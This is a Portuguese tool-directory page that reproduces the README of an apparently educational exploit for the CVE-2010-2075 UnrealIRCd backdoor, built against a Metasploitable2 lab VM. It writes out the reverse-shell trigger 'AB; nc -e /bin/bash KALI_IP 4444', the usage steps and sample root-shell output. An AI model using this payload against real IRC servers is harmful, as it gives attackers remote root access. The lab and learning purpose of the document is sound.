Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2010-2075 — Exploit de backdoor do UnrealIRCd 3.2.8.1 — reverse shell via AB; trigger, construído do zero em Python usando sockets brutos. Sem Metasploit. | Kitploit
Ferramentas/GitHubGitHub/rushikesh-a-bhujbal/cve-2010-2075
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoSegurança da Cadeia de SuprimentosAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
Labs e Prática
GitHubrushikesh-a-bhujbal/cve-2010-2075

CVE-2010-2075

Exploit de backdoor do UnrealIRCd 3.2.8.1 — reverse shell via AB; trigger, construído do zero em Python usando sockets brutos. Sem Metasploit.

Ver Repositório
1há 10h 25mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2010-2075 — Exploit de Backdoor no UnrealIRCd 3.2.8.1

Python Platform Target License


Visão Geral

O UnrealIRCd é um servidor IRC (Internet Relay Chat) de código aberto — um protocolo que permite aos usuários se comunicarem em tempo real através de uma rede, semelhante às primeiras plataformas de chat.

Em 2009–2010, foi descoberto que o UnrealIRCd 3.2.8.1 distribuído através dos espelhos de download oficiais havia sido comprometido. Um atacante havia substituído o código-fonte legítimo por uma versão com backdoor contendo um gatilho oculto de execução de comandos.

Este foi um ataque à cadeia de suprimentos — idêntico em natureza ao CVE-2011-2523 (vsftpd 2.3.4). O software legítimo foi substituído por uma versão modificada maliciosamente antes que os usuários o baixassem.


Como a Backdoor Funciona

A backdoor monitora todos os dados recebidos na porta 6667. Se qualquer entrada começar com a string AB;, tudo após ela é passado — contornando completamente toda a lógica do IRC, autenticação e verificações de registro.

diretamente para system()

O gatilho é disparado durante a fase de inicialização da conexão, antes mesmo de o servidor IRC registrar o cliente. Sem NICK, sem USER, sem necessidade de autenticação.

Fluxo do ataque:

root@kitploit:~
Attacker (Kali)                    Target (Metasploitable2)
                                   
1. s1 connects to port 6667   
   NICK + USER handshake      →    Server sends full banner
   Read banner, check version  
   Confirm Unreal3.2.8.1      
                                   
2. Open listener on port 4444  
   (waiting for incoming shell)
                                   
3. s2 connects to port 6667   →    AB; nc -e /bin/bash KALI_IP 4444
                               →    system() executes immediately
                               →    netcat spawns bash, connects back
                                   
4. listener.accept()          ←    Incoming root shell connection
   Interactive root shell      

Reverse Shell vs Bind Shell

Este exploit usa um reverse shell — o alvo se conecta de volta ao atacante, em vez de o atacante se conectar a uma porta no alvo.

TipoDireçãoUsado Em
Bind shellAtacante → AlvoCVE-2011-2523 (vsftpd)
Reverse shellAlvo → AtacanteCVE-2010-2075 (UnrealIRCd)

Reverse shells contornam regras de firewall de entrada — conexões de saída do alvo raramente são bloqueadas.


Requisitos

  • Python 3.x
  • Sem bibliotecas externas — apenas biblioteca padrão
  • netcat instalado no alvo (presente por padrão no Metasploitable2)
  • Alvo: Metasploitable2 executando UnrealIRCd 3.2.8.1

Uso

root@kitploit:~
git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075

Edite main.py e defina:

root@kitploit:~
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"

Execute:

root@kitploit:~
python3 main.py

Exemplo de saída:

root@kitploit:~
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit

Tratamento de Erros

CenárioComportamento
Porta 6667 fechadaImprime "Port Closed", encerra normalmente
Versão incorretaImprime "Not vulnerable", encerra normalmente
Alvo não retorna a chamadalistener.accept() aguarda (adicione timeout se necessário)
Comando não produz saídarecv() expira silenciosamente, retorna ao prompt

Diferença Principal em Relação ao CVE-2011-2523

CVE-2011-2523 (vsftpd)CVE-2010-2075 (UnrealIRCd)
ProtocoloFTP (porta 21)IRC (porta 6667)
Gatilho:) no nome de usuárioPrefixo AB; em qualquer entrada
Tipo de shellBind shell (porta 6200)Reverse shell (porta do atacante)
Conexões2 de saída1 de saída + 1 de entrada

Testado Contra

  • Metasploitable2 (VM intencionalmente vulnerável)
  • UnrealIRCd 3.2.8.1
  • Linux metasploitable 2.6.24-16-server

Aviso Legal

Este exploit foi desenvolvido estritamente para fins educacionais e pesquisa de segurança autorizada apenas.

Construído e testado exclusivamente contra uma máquina virtual Metasploitable2 local em um ambiente de laboratório totalmente isolado.

Não use isto contra qualquer sistema que você não possua ou para o qual não tenha permissão explícita por escrito para testar. O uso não autorizado é ilegal sob o Computer Fraud and Abuse Act (CFAA) e leis equivalentes em todo o mundo.

O autor não aceita qualquer responsabilidade pelo uso indevido deste código.


Referências

  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2010-2075
  • Entrada NVD: https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • Divulgação Original: https://www.exploit-db.com/exploits/13853
  • Metasploitable2: https://sourceforge.net/projects/metasploitable/

Autor

Rushikesh Bhujbal
Security Research & Exploit Development
GitHub

Baixar ferramenta